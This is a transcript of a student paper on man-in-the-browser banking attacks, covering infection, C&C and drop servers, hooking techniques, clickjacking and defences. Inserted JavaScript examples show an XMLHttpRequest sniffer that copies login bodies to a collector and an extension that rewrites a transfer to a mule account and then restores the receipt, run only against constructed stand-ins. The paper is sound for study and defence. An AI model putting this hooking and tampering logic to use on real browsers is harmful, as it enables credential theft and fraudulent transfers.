man in the browser attacks

Man-in-the-browser attacks Christofilos Konstantinos (MM4140023) Gerardos Pavlos (MM4140001) Pantazaras Sokratis (MM4140013) March 13th, 2015 MSc in Information Systems – Part Time, 2014-2016 Course: “Critical Information and Communication Infrastructure Protection”

Upload: konstantinos-christofilos

Post on 04-Oct-2015


DESCRIPTION

From Man-in-the-middle to Man-in-the-browser attacks, the most well-known exploitation techniques for web hijacking.

TRANSCRIPT


  • 1 Man-in-the-browser attacks - Christofilos, Gerardos, Pantazaras

    Contents

    1. Introduction
    2. From M to B
    3. Malware distribution overview
    4. The Man-in-the-browser (MITB) attack
    4.1 Points of attack
    4.2 MITB attack step-by-step
    4.3 Famous MITB malware
    4.4 What makes the MITB attack difficult to defend against
    4.5 Defending against MITB attacks
    5. Variants of MITB
    5.1 Clickjacking
    5.2 Boy-in-the-browser (BITB)
    5.3 Man-in-the-Mobile (MITMO)
    6. Conclusions
    7. References


    1. Introduction

    The Internet has transformed the global economy and revolutionised the way people interact, communicate and exchange information and goods.

    Users can easily and quickly use any kind of personal device (smartphone, tablet, laptop) to access online services, and those services now communicate in both directions: not only do they update their users, they are also updated by them (Web 2.0).

    One of the most commonly used services globally is Internet banking (e-banking).

    As of April 2012, around 423 million people worldwide accessed online banking sites, i.e. 28.7 percent of all Internet users [1]. For North America and Europe alone, the figures were 45% and 37.8% respectively.

    [Graph: development of global online banking penetration; source: statista.com]

    The statistics presented above allow us to understand the importance and usability of e-banking to Internet users.

    They also allow us to understand why cybercriminals are interested in exploiting these services. As more and more people are accessing online banking services, they become potential targets to those who have the technical expertise and audacity to swindle them and gain personal financial benefit.

    [1] http://www.statista.com/statistics/233284/development-of-global-online-banking-penetration/


    2. From M to B

    One of the most well-known types of attack against financial institutions is the Man-in-the-Middle (MITM) attack.

    This method is based on the attacker's ability to intercept a legitimate user's session with a bank's web server and to use their own machine as a proxy. All data then passes through the attacker's computer, giving them complete control over it and allowing tampering without either end's knowledge.

    This method has been used by cybercriminals for quite some time. However, I.T. security engineers have managed to strengthen their defences through device identification and Risk Engines (REs).

    Risk engines analyse information about every user session, such as unique device IDs (UDIDs), login times and session duration. The data is combined and analysed to evaluate whether the activity is reasonable/typical for that specific user (behavioural profile). If the analysis raises an alert, the issue is escalated for further inspection.

    The above factors - technology (risk engines), experience (previous incidents) and the maturity of Internet users (it is easier for today's average user to identify a fraudulent website than it was some years ago) - have contributed to making MITM attacks very difficult to execute successfully.

    For this reason, cybercriminals started to move towards a more advanced and promising method.

    Instead of hijacking user sessions at the network layer (during transmission of data), attackers have begun to target the user's application layer directly: the web browser.


    Trojan horses, distributed through various well-known methods (email attachments, hyperlinks on social networks or hijacked websites), install extensions into web browsers. These extensions are able to:

    - Modify what the user sees on their screen (DOM manipulation);
    - Modify and/or redirect the user's original data before encryption and transmission take place. Because the rewritten request leaves the browser as a normal, authenticated request, it looks legitimate to the web banking server, and the fraud cannot be detected there;
    - Modify the transaction data returned in the server's response, so that the information presented to the user looks exactly as they expect.

    3. Malware distribution overview

    The Internet provides a wealth of information and services to every user around the world. Of course, some of the available services serve non-legitimate purposes. Underground communities have created well-organised online markets where users can obtain malicious software for their needs (Malware-as-a-Service - MaaS).

    Before proceeding with the details of how a MITB attack takes place, we will describe how malware in general is distributed to the computers of unsuspecting users all around the world.

    Malware distribution involves three parts:

    [Figure: Malware distribution - parties involved]

    a) Infection Point

    The infection point is the method by which the malware is delivered to the target machines. There are several distribution methods, such as:


    - A hijacked website which automatically downloads and installs a trojan on the user's computer (drive-by download).
    - An email attachment which contains executable code and runs when the user opens it.
    - A USB key which contains the malware and runs when the user connects it to their computer (autorun.inf).
    - A PDF document or a PowerPoint presentation with embedded script code.

    b) Command and Control (C&C) Server

    Once the malware has been installed on the computer, the attacker must provide instructions about the exact actions to be performed. These instructions come in a configuration file that is distributed to the target machines from a Command & Control (C&C) server. They contain information such as:

    - Website URLs that need to be monitored and intercepted;
    - Custom form fields that need to be added/changed per URL;
    - Drop server locations, where all intercepted data will be sent.

    The configuration files are usually encrypted/obfuscated, so that their content is difficult to examine, and can easily be updated from the C&C server with new information, e.g. new e-banking URLs, updated form fields and drop servers.

    c) Drop Server

    The drop server is the location to which all data collected from the target computers is sent. It could be a hijacked machine whose administrator/owner has no idea that it is being used by cybercriminals, or the same C&C server the attackers already use.


    4. The Man-in-the-browser (MITB) attack

    A web browser is the client-side application which communicates with remote web servers, downloads content and renders it on the user's screen.

    The main concept behind the MITB attack is that the rendering of information received from the web server (i.e. the DOM tree that determines how the page is displayed) can be edited/manipulated on the fly in order to customise/improve the user's experience, e.g. to remove ads/banners or change colours (augmented browsing).

    Although there is nothing wrong with this concept, exactly the same method can be used for malicious purposes: the mechanisms that can change the layout or the colours of a web page can also change the values of submitted forms in the background, while displaying whatever their creator wants on the user's screen.

    4.1 Points of attack

    Extra functionality can be inserted into web browsers in a variety of ways, depending on the browser type. Such functionality usually aims at enhancing the user experience, but fraudsters can use the same capability to take control of the browser. Ways to incorporate new functions into the browser include:

    Browser Helper Objects (BHOs)

    Browser helper objects are dynamically-loaded libraries (DLLs) designed specifically for Microsoft's Internet Explorer, with access to the Document Object Model (DOM). They are activated on browser start-up and provide additional functionality; e.g. the Adobe Acrobat plugin is a BHO which allows PDF files to be opened directly in the web browser.


    [Figure: List of Add-ons (BHOs) in Internet Explorer]

    BHOs have been used extensively by cybercriminals because they are easy to develop and, being loaded into the browser process itself, run with the browser's own privileges and full access to everything it renders.

    Extensions

    Similar functionality to BHOs is provided in other browsers, such as Chrome, Firefox or Opera, by extensions. Some of them, like Greasemonkey for Firefox (www.greasespot.net), act as a host for custom-made user scripts. That is, Greasemonkey does not perform one specific action - as the Adobe Acrobat plugin does for PDF files - but instead allows any user script to run with its own custom functionality, like a dynamic, reprogrammable extension.

    [Figure: List of extensions in Google Chrome]


    API hooking

    API hooking is a complex technique which allows modification of the API calls between an application (.exe) and the DLLs it loads dynamically, whether application or system libraries. For example, on Windows the Windows Internet API (wininet.dll) lets applications access Internet resources over HTTP and FTP. Malware running on the machine can - once activated - hook functions of wininet.dll such as InternetConnect(), HttpSendRequest(), HttpOpenRequest() and InternetReadFile() and modify the original calls. Because TLS is applied below this API, the hooked functions see requests and responses in plaintext even for HTTPS sites.

    [Figure: API hooking on wininet.dll]

    AJAX sniffing

    Another technique used for MITB attacks is AJAX sniffing. This time the approach is to go through the web application itself in order to collect or alter data on the client side. Web technologies have evolved rapidly in recent years and can now provide high-quality services with very smooth and fast functionality. To let users enjoy Web 2.0 services, techniques were devised to work around the drawbacks of classic HTTP pages, such as the synchronous request/response cycle. The commonly used technology is Asynchronous JavaScript and XML (AJAX), which makes navigating and using a web application look and feel more like a desktop application. AJAX is based on a JavaScript object called XMLHttpRequest, which calls URLs asynchronously in the background of a page visit and can update specific parts of the page, or the whole page, when a response is returned. AJAX sniffing builds on that implementation: it injects JavaScript snippets into web pages that are vulnerable to XSS attacks. XSS (Cross-Site Scripting) exploits vulnerabilities in the web application (request parameters echoed into the page without proper encoding) and allows the attacker to inject code into a web page via the HTTP payload (POST or GET parameters). Once the malicious JavaScript runs in the victim's page, it overrides the XMLHttpRequest object and starts sniffing all the requests the client makes to the server. Because the injected code runs in the origin of the vulnerable site, the same-origin policy does not stop it, and it can intercept all the information exchanged between client and server and forward it to a remote server (drop server), where it can be used for whatever purpose the cybercriminals have in mind. Consider that modern sites log users in via AJAX calls, which means that the usernames and passwords of all users can be collected without installing any malware on the clients. That is the worst aspect of AJAX sniffing. Fortunately, this kind of attack relies on server-side vulnerabilities; the main responsibility therefore shifts to the web server's administrator(s), who are, in theory, more technically aware of information systems security than a normal user.
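    The hooking step described above, as an added example that is not part of the original paper: the sniffer wraps XMLHttpRequest.prototype.open and send so that every request body is copied to an attacker-controlled collector before the request proceeds, and a page-side integrity check compares the live prototype methods with references taken before any untrusted script ran. Node.js has no XMLHttpRequest, so a constructed stand-in class with the same open/send shape is used; the login endpoint, the credentials and the collector callback are hypothetical.

```javascript
// Added example, not code from the paper: an AJAX sniffer hooking XMLHttpRequest,
// and a page-side integrity check against it. Node.js has no XMLHttpRequest, so a
// constructed stand-in with the same open/send shape is used; the login endpoint,
// credentials and collector callback are hypothetical.

class StandInXMLHttpRequest {
  open(method, url) { this.method = method; this.url = url; }
  setRequestHeader(name, value) { this.headers = this.headers || {}; this.headers[name] = value; }
  send(body) { this.sentBody = body; this.status = 200; }
}

// Attacker side (what the injected script does): wrap open() and send() on the
// prototype so that every request is copied to the collector before it proceeds.
function installSniffer(XHR, collect) {
  const origOpen = XHR.prototype.open;
  const origSend = XHR.prototype.send;
  XHR.prototype.open = function (method, url, ...rest) {
    this.__method = method;                        // remembered for send()
    this.__url = url;
    return origOpen.call(this, method, url, ...rest);
  };
  XHR.prototype.send = function (body) {
    collect({ method: this.__method, url: this.__url, body: body == null ? null : String(body) });
    return origSend.call(this, body);              // request still succeeds; the user sees nothing
  };
}

// Page side: compare the live prototype methods with references captured before any
// untrusted script could run. In a browser the same idea can be applied by checking that
// Function.prototype.toString.call(XMLHttpRequest.prototype.send) ends in "[native code]",
// with the caveat that a careful attacker patches toString as well.
function xhrIsHooked(XHR, pristine) {
  return XHR.prototype.open !== pristine.open || XHR.prototype.send !== pristine.send;
}

// Demonstration: the page's login call issued after the sniffer is in place.
function runScenario() {
  class XHR extends StandInXMLHttpRequest {}        // fresh copy so repeated runs do not stack hooks
  const pristine = { open: XHR.prototype.open, send: XHR.prototype.send };
  const stolen = [];
  installSniffer(XHR, (rec) => stolen.push(rec));  // in a real attack: beacon to the drop server

  const xhr = new XHR();
  xhr.open("POST", "https://secure.ebanking.site/api/login");
  xhr.setRequestHeader("Content-Type", "application/json");
  xhr.send(JSON.stringify({ user: "alice", pass: "hunter2" }));   // constructed credentials

  return { stolen, hooked: xhrIsHooked(XHR, pristine), status: xhr.status };
}

// Runs stand-alone.
console.log(runScenario());
```

    In a real page the collector would typically be an image beacon or a fetch to the drop server; a Content-Security-Policy with restrictive connect-src and img-src limits where such a hook can send data, but the proper fix is removing the XSS that let the hook in, since injected code running in the same origin can also undo any in-page check.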

    4.2 MITB attack step-by-step

    A detailed, step-by-step description of the MITB attack follows:

    1. The Trojan infects the computer's software, either at the operating system or at the application level (infection point).
    2. The Trojan installs an extension into the browser configuration, so that it will be loaded the next time the browser starts.
    3. At some later time, the user restarts the browser.
    4. The browser loads the extension.
    5. The extension registers a handler for every page-load.
    6. Whenever a page is loaded, the extension checks the URL of the page against a list of known sites targeted for attack.
    7. The user logs in securely on to, for example, https://secure.ebanking.site/.
    8. When the handler detects a page-load matching a specific pattern in its target list (for example https://secure.ebanking.site/account/do_transaction), it registers a button event handler.
    9. When the submit button is pressed, the extension extracts all data from all form fields through the DOM interface in the browser, and remembers the values.
    10. The extension modifies the values through the DOM interface.
    11. The extension tells the browser to continue to submit the form to the server.
    12. The browser sends the form, including the modified values, to the server.
    13. The server receives the modified values in the form as a normal request. The server cannot differentiate between the original values and the modified values, or detect the changes.
    14. The server performs the transaction and generates a receipt.
    15. The browser receives the receipt for the modified transaction.
    16. The extension detects the https://secure.ebanking.site/account/receipt URL, scans the HTML for the receipt fields, and replaces the modified data in the receipt with the original data that it remembered.
    17. The browser displays the modified receipt with the original details.
    18. The user thinks that the original transaction was received by the server intact and authorised correctly.
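    Steps 6 to 18 above, together with the configuration-file contents described in section 3(b) and the three extension capabilities listed at the end of section 2, as an added example that is not part of the original paper: a simulation of the extension's logic against an in-memory model of the form and the receipt rather than a live DOM. The target URLs, field names, account numbers and amounts are all constructed. The last function shows why the out-of-band verification of section 4.5 helps: a confirmation built from the values the server actually received, delivered outside the browser, reveals the swap.

```javascript
// Added example, not code from the paper: simulation of the MITB extension
// logic of section 4.2 against an in-memory model of the form and receipt.
// All URLs, field names, account numbers and amounts are constructed.

// Hypothetical C&C configuration (section 3(b)): pages to hook, fields to rewrite.
const CONFIG = {
  targets: [
    {
      formUrl: "https://secure.ebanking.site/account/do_transaction",
      receiptUrl: "https://secure.ebanking.site/account/receipt",
      // Values substituted on submit: mule account and attacker-chosen amount.
      overrides: { to_account: "GR00MULE00000000000000001", amount: "4950.00" },
    },
  ],
};

// Step 6: look the current URL up in the target list.
function findTarget(url, cfg) {
  return cfg.targets.find((t) => url.startsWith(t.formUrl) || url.startsWith(t.receiptUrl)) || null;
}

// Steps 9-12: on submit, remember the original field values and swap in the overrides.
// Returns what the browser will actually send and what the extension remembered.
function tamperSubmission(url, fields, cfg) {
  const target = findTarget(url, cfg);
  if (!target || !url.startsWith(target.formUrl)) {
    return { sent: { ...fields }, remembered: null }; // not a targeted form: pass through
  }
  const remembered = { ...fields };                  // step 9
  const sent = { ...fields, ...target.overrides };   // step 10
  return { sent, remembered };
}

// Step 16: on the receipt page, put the remembered originals back into the HTML
// wherever the server echoed the modified values.
function restoreReceipt(url, html, remembered, cfg) {
  const target = findTarget(url, cfg);
  if (!target || !url.startsWith(target.receiptUrl) || !remembered) return html;
  let out = html;
  for (const [name, value] of Object.entries(target.overrides)) {
    out = out.split(value).join(remembered[name]);
  }
  return out;
}

// Section 4.5, out-of-band verification: a confirmation built from what the
// server received and delivered outside the browser shows the real transaction.
function oobConfirmation(serverSideFields) {
  return `Confirm transfer of ${serverSideFields.amount} to ${serverSideFields.to_account}`;
}

// Steps 7-18 end to end with constructed input.
function runScenario(cfg = CONFIG) {
  const target = cfg.targets[0];
  const userFields = {
    from_account: "GR12ALICE0000000000000001",
    to_account: "GR34LANDLORD000000000001",
    amount: "120.00",
  };
  const { sent, remembered } = tamperSubmission(target.formUrl, userFields, cfg);
  // The server only ever sees `sent` and renders its receipt from those values (steps 13-14).
  const serverReceipt =
    `<tr><td>To</td><td>${sent.to_account}</td></tr>` +
    `<tr><td>Amount</td><td>${sent.amount}</td></tr>`;
  const shownToUser = restoreReceipt(target.receiptUrl, serverReceipt, remembered, cfg);
  return { sent, serverReceipt, shownToUser, sms: oobConfirmation(sent) };
}

// Runs stand-alone.
const result = runScenario();
console.log("server saw:  ", result.serverReceipt);
console.log("user saw:    ", result.shownToUser);
console.log("OOB message: ", result.sms);
```

    Note what the server-side view contains: a well-formed, authenticated request with a consistent receipt. Nothing in it distinguishes the rewritten values from ones the user typed, which is the point made in step 13; only a channel the extension does not control (the SMS text above) carries the discrepancy to the user.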


    4.3 Famous MITB malware

    A few of the most well-known malware families which use the MITB attack method:

    - Zeus/Zbot: Zeus/Zbot and its variants (e.g. Zeus Gameover P2P) is probably the best-known financial malware. It infects Windows machines and follows the client/server model (it requires a C&C server to organise the attack). It steals private data from infected computers, such as usernames/passwords and banking credentials, by injecting content into the pages shown in the user's web browser (web injects).

    - Carberp: In 2012, the Carberp malware was reported replacing Facebook pages with fake ones stating that the user's account was temporarily locked. To unlock the account, the user had to complete a web form asking for personal information such as name, email and password, and also to pay a €20 uKash e-voucher to confirm the verification. The voucher was supposedly added to the user's Facebook account balance, but in reality the 19-digit uKash code was transferred to the Carberp botmaster, who could use it as a cash equivalent.

    [Figure: Carberp's Facebook attack]

    4.4 What makes the MITB attack difficult to defend against

    Man-in-the-Browser attacks pose a high risk due to the following factors:

    Infection is easy

    Users are accustomed to downloading files from the Internet and to regularly updating their installed applications, including their web browser and its various extensions. Software updates are usually either approved automatically without any user intervention, or not given enough attention (users tend to just click Accept on installation prompts without noticing what the dialogs state).


    Detection is hard

    All the technical vectors involved in the MITB attack (extensions, scripts) are carefully crafted, require advanced technical knowledge and, most importantly, are installed and run only on the client side, where normal users usually have neither the expertise nor the tools to defend themselves. Additionally, such malware is usually distributed as many variants of the malicious code in order to evade the antivirus/antispyware software installed on client machines.

    Authentication and server-side fraud detection mechanisms are inadequate

    MITB is not a phishing attack; it does not rely on fake artefacts, e.g. malicious websites that resemble the real ones, to steal users' information. All the data the e-banking servers receive is indeed sent by legitimate users from their own machines. This means that traditional security measures such as authentication (username/password) or transaction verification by one-time passwords (OTP) are rendered useless: the user types the OTP into the same browser the malware controls, so the valid OTP ends up authorising the transaction the malware actually submitted rather than the one the user saw.

    4.5 Defending against MITB attacks

    As already stated, MITB attacks are quite advanced both in concept and in technology, which means that there is no easy way to defend against them. However, some techniques and/or proposals can be used against them and are presented below:

    Hardened browser

    The concept of a hardened browser is based on creating a browser that can access e-banking services without allowing any kind of external/custom-made code - which by default might be malicious (extensions/BHOs) - to load. Additionally, the application should be distributed as a single, static binary, so as to also avoid API hooking through dynamically-loaded external libraries. In more detail, a hardened browser should fulfil the following requirements:

    - Statically compiled: prohibit loading of dynamic libraries.
    - Stripped: no compiler symbols should be available to guide an attack.
    - Additional binary-protection methods: the executable should be encrypted or packed.
    - Allow only HTTPS connections; prohibit plain HTTP.
    - Process monitoring for executables launched from the browser.
    - Memory-space protection (against key loggers and/or screen-capturing applications).
    - White-list of valid e-banking websites: the browser can only connect to a predefined list of e-banking servers.
    - White-list of SSL certificates: no addition of SSL certificates is allowed.

    Pros

    + No extensive work is required to customise and strip down industry-standard browsers (Firefox, Chrome, IE).
    + Can easily be distributed as an alternative/parallel installation for use only on secure e-banking sites.
    + Better usability than a live distribution: if an update is published, users just download the new version, with no need to burn a new CD or re-format a USB stick.

    Cons

    - Allowing only white-listed websites or SSL certificates may mean continuously updating the executable with new/updated information. This is obviously not very practical and is certainly a tiring process for end users, who would prefer not to be involved.
    - Downloading the hardened browser is itself susceptible to phishing: the user may be deceived and redirected to a website distributing a malicious/vulnerable version of the supposedly hardened browser.

    Bootable, write-protected live distributions (live-CD/DVD)

    Free/open source distributions of client operating systems, such as Knoppix, can be burned to bootable, read-only media (CD/DVD). As the media is write-protected, nothing can be installed permanently: if the user wishes to perform an online bank transaction, a reboot resets all browser settings to their defaults and allows the user to connect to the e-banking server from a known-good state.

    Pros

    + Upon reboot, a live-CD is in a known-good state and is considered highly secure.

    Cons

    - Browsers on live-CDs also need to be updated and patched every time the user restarts the live-CD distribution; otherwise they run the risk of connecting to the web banking server with a vulnerable browser.
    - Users don't like to reboot their computers very often, especially as they lose all the customisations made during their current session. It is quite probable that they will eventually either not reboot - which poses a security issue - or not use the live-CD distribution at all.


    Out-of-band transaction verification

    A popular method to counter a MITB attack is so-called Out-of-Band (OOB) transaction verification. This method uses a communication channel other than the web browser (telephone call, SMS) through which the transaction details, as received by the bank, are presented to the user for verification.

    Pros

    + Works with standard devices (mobile phones); does not need additional hardware.

    Cons

    - Can easily be subverted if the verification details (phone number) are stored in the user's online account, since the malware controlling the browser can change them.
    - OOB SMS can also be broken by Man-in-the-Mobile (MITMo) attacks such as ZitMo (Zeus-in-the-Mobile) and SpitMo (SpyEye-in-the-Mobile).

    Campaigning and training for raising awareness

    Apart from the technical measures, campaigns and training sessions by financial institutions and government agencies help raise user awareness of how these attacks take place and how they can be identified. One of the more effective ways of stopping MITB is educating Internet users about the extent of the threat. The malware has to enter the user's computer somehow, so if users are made aware of how this can happen, MITB is less likely to be effective. Properly maintained firewalls and scanning of all downloads will significantly reduce a user's risk of becoming a victim.


    5. Variants of MITB

    The MITB attack method is really a family of malware components designed to exploit weaknesses in users' browsers. Some members of the family can be classified as sub-categories in their own right. The most important of these are presented briefly below.

    5.1 Clickjacking

    Clickjacking was first described by Jeremiah Grossman (of WhiteHat Security) and Robert Hansen back in 2008. The idea is to create a layer of apparent authenticity, under which lies a different purpose. An easy-to-understand example is given at http://www.troyhunt.com/2013/05/clickjack-attack-hidden-threat-right-in.html; its gist is described below.

    Assume that a user is engaged in online banking. They are already logged into the bank's service and most probably assume that they are perfectly safe as long as this is the case. Moreover, they expect that any content displayed while they browse through their account and transaction information originates from the bank.

    At some point the user comes across a page which includes some sort of offer, for example the chance to win a free iPad. The user may be tempted to give it a shot: if it comes from the bank, it must be safe. They click on some link, and something quite different happens: perhaps an amount of money is transferred from one of their accounts to another account the user knows nothing about. It will probably be some time before the user realises that something has gone wrong.

    How did this happen? The usual mechanism is quite simple. Assume a website the attacker is interested in (we'll refer to it as website A - the bank's website in the example above) and a user who has access to that website (the user engaged in web banking). The success of this method depends on whether the attacker can trick the user into visiting a different website (website B), which is under the former's control. If the user's browser is running malicious BHOs or plug-ins as a result of having been hijacked, this is quite easy.

    The user is directed to website B after pointing their browser at a location of interest (as described in the MITB section). Website B is under the attacker's control, so the attacker can render, for instance, JavaScript and multiple pages. Website A is loaded inside an iframe on B and is initially displayed as-is to the user. The user starts interacting with website A as normal: they log in and take care of their business, never aware that something is wrong. At any time, the attacker can place content of their choosing on website B and overlay it on the content of A in a variety of ways (such as rendering the content of website A invisible). The attacker then takes advantage of the fact that the user is still actually interacting with A while seeing something completely different on screen. In other words, the attacker tricks the user into performing legitimate bank transactions, while the user is under the impression that they are doing something completely different (such as opting in for a free iPad).

    L. Huang et al., in their paper "Clickjacking: Attacks and Defenses", classify current clickjacking attacks into three categories, which correspond to the ways in which users are made to issue input commands (e.g. clicking on a link) that result in actions different from what they believe they are performing (the phrase "out of context" is used throughout the paper to describe this situation). These categories are:

    - Attacks that compromise target display integrity: the user sees something different from what the legitimate website is actually showing at the moment they decide to click.
    - Attacks that compromise pointer integrity: the feedback given by the cursor or other input device is no longer reliable, having been tampered with, so that the user clicks on something different from what they intended.
    - Attacks that compromise temporal integrity: users are not given enough time to understand what they are clicking on and whether they'd really like to proceed.

    An interesting distinction is made between clickjacking attacks and social engineering attacks, which do not attempt to manipulate security mechanisms to breach a website's security, but rather manipulate people into doing something they normally wouldn't do. A social engineering attack is more or less the psychological bullying of the user into giving out information of value to attackers (e.g. account numbers, e-mails, passwords), because the user is manipulated into doing so by social conventions. A simple example is a social network post which prompts the user to "like" it or interact with it by posing as an organisation for the aid of blind children. The user may just go ahead and do this to appear concerned and socially responsible to others. The problem here arises from people being naive enough to follow a social convention without verifying that the information they are handing out is actually going where they expect; this has nothing to do with clickjacking.

    The most widely used clickjacking defences today use frame-busting. Frame-busting refers to code provided by a web page which prevents the page from being loaded in an iframe, as described above. The basic principle of the code is simple: if this document is not the top-level window, navigate the top-level window to it.

    // Frame-busting: break out of any enclosing frame.
    // Comparing the window objects is the idiomatic check; assigning top.location
    // is permitted even from a cross-origin frame.
    if (top !== self) {
        top.location = self.location;
    }

    Unfortunately, frame-busting has the major drawback of being incompatible with third-party widgets such as "like" and "follow" buttons, and a determined attacker can neutralise the script itself, for example by loading the page in a sandboxed iframe that is not allowed to navigate the top-level window. For that reason the server-side controls that instruct the browser not to frame a page at all - the X-Frame-Options response header and the frame-ancestors directive of Content-Security-Policy - are the more robust choice. Other approaches include:

    - User confirmation: the user is prompted to verify their initial action.
    - User interface randomisation: the positioning of sensitive elements (buttons, links, etc.) varies every time a page is loaded.
    - Opaque overlay: all cross-origin frames are rendered opaquely (a technique employed by the Gazelle browser).


    Evidently, these approaches suffer from problems of their own. User confirmation is notorious for straining users' patience, as they find it burdensome to make multiple clicks to complete one action. Interface randomisation violates the basic principle of keeping an interface consistent so that users can grow accustomed to it and not get lost every time they interact with it. Finally, opaque overlay removes all transparency from all cross-origin elements, thus deforming many websites that are not being used for malicious purposes.

    5.2 Boy-in-the-browser (BITB) The Boy-in-the-Browser method of attack is generally considered a less-mature, dubbed-down version of the MITB attack. There are some differences between the two approaches:

    The BITB trojan redirects the traffic between the infected browser and the website of interest to a third-party site (which may even mimic the legitimate one), where most of the unauthorised processing takes place, either it consist of simply copying down the information passed or altering the ongoing transactions in some form.

    BITB scripts are much simpler than MITB scripts, and therefore require fewer resources. Evolving a new BITB trojan can be a process that takes a few hours, while useful MITB trojans usually need months to mature.

    BITB trojans evolve much more frequently, and therefore anti-virus programs have more difficulty catching up with the latest threats.

    It is easier to locate the culprit once the attack has been recognised as a BITB attack, and shut down the third-party server collecting and processing the information.

    Because of their nature, BITB trojans tend to be used for one-time hit-and-run operations. They are also used to target a greater variety of websites and are not primarily focused on financial institutions.

    The basic outline of the method of operation is this: once the BITB trojan is downloaded, it starts tampering with the user's system hosts file, mainly by adding new entries to it. This re-maps specific hostnames to addresses which point to websites controlled by the attacker (these websites may be phishing sites or act as proxies to legitimate sites). As in the MITB situation, the victim is completely unaware: the URLs displayed in the browser address bar are the legitimate ones.
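    The hosts-file tampering just described leaves a simple trace on the infected system. The following Node.js code is an added example (not from the paper) of checking for it from the defender's side: it parses hosts-file text and reports entries that pin a watched domain (for instance a bank's) to any address at all, or any other non-local hostname to a non-loopback address. The hosts-file content, the domain names and the addresses are constructed samples.

```javascript
// Added example (not from the paper): detecting BITB-style hosts-file
// tampering. Runs under Node.js; SAMPLE_HOSTS and the domain names are
// constructed, not taken from a real infection.

// Addresses that may legitimately appear in a clean hosts file
// (loopback, plus 0.0.0.0 which ad-blocking lists use as a sinkhole).
const LOCAL_ADDRESSES = new Set(['127.0.0.1', '::1', '0.0.0.0']);

// Hostnames that a default hosts file normally contains.
const LOCAL_NAMES = new Set([
  'localhost', 'localhost.localdomain', 'broadcasthost',
  'ip6-localhost', 'ip6-loopback', 'ip6-localnet', 'ip6-mcastprefix',
  'ip6-allnodes', 'ip6-allrouters', 'ip6-allhosts',
]);

// Parse hosts-file text into { address, hostname, line } records.
// Comments (#...) and blank lines are skipped; one address may be
// followed by several hostnames on the same line.
function parseHosts(text) {
  const entries = [];
  text.split(/\r?\n/).forEach((raw, index) => {
    const line = raw.replace(/#.*$/, '').trim();
    if (!line) return;
    const [address, ...names] = line.split(/\s+/);
    for (const name of names) {
      entries.push({ address, hostname: name.toLowerCase(), line: index + 1 });
    }
  });
  return entries;
}

// true if hostname equals, or is a subdomain of, one of the watched domains
function matchesWatched(hostname, domains) {
  return domains.some(d => hostname === d || hostname.endsWith('.' + d));
}

// Entries that indicate tampering: a watched domain pinned to any address
// at all, or any other non-local hostname pinned to a non-local address.
// Local names on loopback addresses form the normal baseline.
function suspiciousHostsEntries(text, watchedDomains) {
  const watched = watchedDomains.map(d => d.toLowerCase());
  return parseHosts(text).filter(e => {
    if (matchesWatched(e.hostname, watched)) return true;
    if (LOCAL_NAMES.has(e.hostname)) return false;
    return !LOCAL_ADDRESSES.has(e.address);
  });
}

// Report findings as "line N: hostname -> address" strings.
function describeFindings(text, watchedDomains) {
  return suspiciousHostsEntries(text, watchedDomains)
    .map(e => `line ${e.line}: ${e.hostname} -> ${e.address}`);
}

// Constructed sample hosts file with attacker-style additions
// (192.0.2.0/24 and 10.0.0.0/8 serve as placeholder addresses).
const SAMPLE_HOSTS = `# constructed sample hosts file
127.0.0.1       localhost
::1             localhost
192.0.2.10      www.bank.example      # added by malware (constructed)
192.0.2.10      online.bank.example
10.0.0.5        mail.example.net
127.0.0.1       ads.tracker.example   # local sinkhole, benign`;

console.log(describeFindings(SAMPLE_HOSTS, ['bank.example']).join('\n'));
```

    To run it against a real machine, read the file with fs.readFileSync (on Windows it lives at %SystemRoot%\System32\drivers\etc\hosts, on Unix-like systems at /etc/hosts) and pass the text to suspiciousHostsEntries together with the domains you care about; any finding for a banking domain is a strong indicator of this kind of redirection, and comparing the file's hash against a known-good copy on a schedule catches additions without needing a domain list at all.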

    5.3 Man-in-the-Mobile (MITMO)

    With the growth of the smartphone market, especially the Android platform, it was inevitable that cyber-attackers would eventually target mobile phones, as they now offer more opportunities than ever for information eavesdropping and related malicious activities. Indeed, with so many apps hitting the market at this pace, covering pretty much everything from gaming to banking to social networking, the prospects are very promising for anyone who wants to gain access to sensitive data quickly and easily.

    It is no surprise that the MITB malware family expanded to hit the new market. Around the start of 2011, S21Security detected a new, rather sophisticated banking trojan, which they named Tatanga, written in C++ and affecting banks in Spain, the United Kingdom, Germany and Portugal using MITB functions. Almost a year later, ESET was following the progress of the same virus family (which they in turn called Gataka), commenting on their blog how surprising it was that it had received so little attention at the time, given that the trojan's stability and functionality were bound to make it popular with fraudsters in the future. In due course, Trusteer noted soon after that a variant of the malware had finally migrated onto the Android platform.

    The attack is not launched at the user's mobile at first, but rather at the user's web browser on their desktop computer. The bait here is a new security feature that has supposedly become available for the Android platform, and which, according to the lure, a great number of users have already installed. The user is prompted to download this app on their mobile by entering their number and submitting an online request, which then results in a text message being sent to their phone. The SMS contains a link to install the alleged app, which is in fact the Tatanga virus.

    Once installed, the virus can capture all SMS traffic, thus gaining access to all sorts of sensitive information (including bank authorisation codes), which it transmits to the attackers.

    This method of attack is very useful in circumventing the out-of-band security mechanisms that a lot of European banks use as a verification method. The out-of-band approach requires the use of a separate medium to act as a verification agent for online transactions launched from a personal computer. That medium is usually the user's mobile phone, to which an SMS verification code is sent, which the user can then enter at the appropriate time to verify that they are actually the party that initiated the transaction. By gaining access to the SMS communications in which the user's phone participates, the virus renders out-of-band authentication ineffective.


    6 Conclusions

    The MITB Trojan, along with all its variations, is yet another example of the undeniable fact that cyber-criminals have turned their attention to ordinary users rather than companies and other organisations, the majority of which are now well aware of the risks of online transactions and tend to invest a lot in security measures and procedures.

    Individual users, on the other hand, remain at best moderately informed about the risks of using online services of any kind. They are not too familiar (or do not wish to become so) with the many pitfalls of such endeavours as online banking. Nevertheless, they make more and more use of available services, thus increasing the chances for attackers to gain profit. As a result, more services become available at a growing pace, especially in the mobile phone market. End users favour mobile applications, as they offer instant access to whatever they need, whenever they need it. The Android app market especially is a goldmine for fraudsters who want to target unsuspecting users: downloading and installing a mobile app is as easy as can be, and it seems that the notion of risk in this area has yet to become common knowledge.

    Clearly, this is something that has to be taken into account, and it is companies that have to take the first step: assuming that users are well protected behind their firewalls and anti-virus platforms can bring down even the most sophisticated of security systems. Even approaches that use multiple media for authorisation (such as the out-of-band verification system) can be bypassed with the advent of mobile-targeted trojans. Raising awareness is of course imperative, but it is worrying that most users tend to believe that it is the companies' responsibility, and not their own, to ensure the secure exchange of information.


    7 References

